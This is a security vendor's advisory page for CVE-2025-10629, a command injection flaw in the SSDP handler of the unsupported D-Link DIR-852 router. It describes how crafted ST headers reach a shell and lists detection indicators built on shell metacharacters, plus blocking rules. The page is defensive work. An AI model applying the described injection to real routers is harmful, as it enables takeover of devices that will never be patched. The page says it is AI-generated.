Skip to main content
A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Find Out Why
CVE Vulnerability Database
Vulnerability Database/CVE-2025-10629

CVE-2025-10629: D-Link DIR-852 Firmware RCE Vulnerability

CVE-2025-10629 is a remote code execution flaw in D-Link DIR-852 firmware affecting the SSDP service. Attackers can exploit command injection to execute arbitrary code. This article covers technical details, impact, and mitigations.

Published:

CVE-2025-10629 Overview

CVE-2025-10629 is a command injection vulnerability affecting the D-Link DIR-852 router running firmware version 1.00CN B09. The flaw resides in the ssdpcgi_main function within the htodcs/cgibin binary, which handles Simple Service Discovery Protocol (SSDP) requests. Attackers manipulate the ST argument to inject arbitrary operating system commands. The attack can be executed remotely over the network. The exploit has been publicly disclosed, increasing the risk of opportunistic abuse. This device is end-of-life and no longer maintained by D-Link, meaning no official patch will be released. The vulnerability is classified under CWE-77 (Command Injection) and CWE-74 (Improper Neutralization of Special Elements).

Critical Impact

Remote attackers can inject operating system commands through the SSDP ST parameter on unsupported D-Link DIR-852 routers, with no vendor patch available.

Affected Products

  • D-Link DIR-852 hardware (end-of-life)
  • D-Link DIR-852 firmware 1.00CN B09
  • Simple Service Discovery Protocol service component (htodcs/cgibin)

Discovery Timeline

  • 2025-09-18 - CVE-2025-10629 published to the National Vulnerability Database
  • 2026-04-29 - Last updated in NVD database

Technical Details for CVE-2025-10629

Vulnerability Analysis

The vulnerability exists in the ssdpcgi_main function inside the htodcs/cgibin component of the DIR-852 firmware. This function processes Simple Service Discovery Protocol (SSDP) messages used for UPnP device discovery on local networks. The ST (Search Target) header value supplied by clients reaches a shell execution context without proper neutralization of metacharacters. An attacker who can send SSDP traffic to the router triggers arbitrary command execution in the context of the SSDP handler process.

The weakness is tracked under CWE-77, Improper Neutralization of Special Elements used in a Command. Because the DIR-852 is no longer supported, this issue will remain unpatched on all deployed units.

Root Cause

The ssdpcgi_main handler passes attacker-controlled input from the ST argument into a system command construction routine without sanitization or argument escaping. Shell metacharacters such as ;, |, and backticks survive into the command line, enabling injection of additional commands. The flaw reflects a common pattern in embedded CGI binaries that concatenate request fields directly into system() or equivalent calls.

Attack Vector

Exploitation requires network access to the router's SSDP listener. Attackers craft SSDP M-SEARCH or related discovery messages with a malicious ST header containing injected shell syntax. The router then evaluates the injected payload during request processing. While SSDP typically runs on the LAN, exposure of UDP port 1900 to untrusted segments or misconfigured WAN interfaces expands the attack surface. Public disclosure of exploitation details, referenced in the GitHub CVE Issue Discussion and VulDB entry #324659, lowers the skill barrier for attackers.

Detection Methods for CVE-2025-10629

Indicators of Compromise

  • SSDP requests on UDP port 1900 containing shell metacharacters (;, |, &, backticks, $()) inside the ST header.
  • Outbound connections from the router to unfamiliar hosts shortly after inbound SSDP traffic.
  • Unexpected new processes or persistence artifacts on the router consistent with downloaded payloads.

Detection Strategies

  • Inspect network captures for malformed SSDP M-SEARCH messages where the ST field deviates from standard URN or service-type syntax.
  • Deploy IDS signatures that flag non-printable or shell control characters in SSDP headers crossing network segments.
  • Correlate router-originated DNS or HTTP traffic with preceding inbound SSDP activity to identify post-exploitation callbacks.

Monitoring Recommendations

  • Log and alert on any external traffic reaching UDP 1900 on consumer routers from the WAN side.
  • Monitor for sudden firmware behavior changes, including new listening ports or modified DNS resolvers on affected devices.
  • Track threat intelligence feeds for botnets known to target D-Link end-of-life models using SSDP injection.

How to Mitigate CVE-2025-10629

Immediate Actions Required

  • Replace the DIR-852 with a currently supported router model, since D-Link will not issue a fix.
  • Disable UPnP and SSDP services on the router where the configuration permits.
  • Block UDP port 1900 at the network perimeter and segment the router away from untrusted clients.
  • Verify the router's WAN interface does not expose SSDP or UPnP to the internet.

Patch Information

No patch is available. D-Link confirms the DIR-852 is no longer supported, and the D-Link Security Information portal directs users to upgrade to supported hardware. Operators should treat continued use as a residual risk requiring compensating controls.

Workarounds

  • Place the device behind a firewall that strips inbound SSDP traffic on UDP 1900.
  • Restrict LAN-side SSDP to trusted VLANs using access control lists on upstream switches.
  • Disable remote administration features and verify the router is not reachable from the WAN.
  • Decommission the device if it must operate in environments with untrusted clients.
bash
# Configuration example: block SSDP at an upstream Linux gateway
iptables -A FORWARD -p udp --dport 1900 -j DROP
iptables -A INPUT   -p udp --dport 1900 -j DROP

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne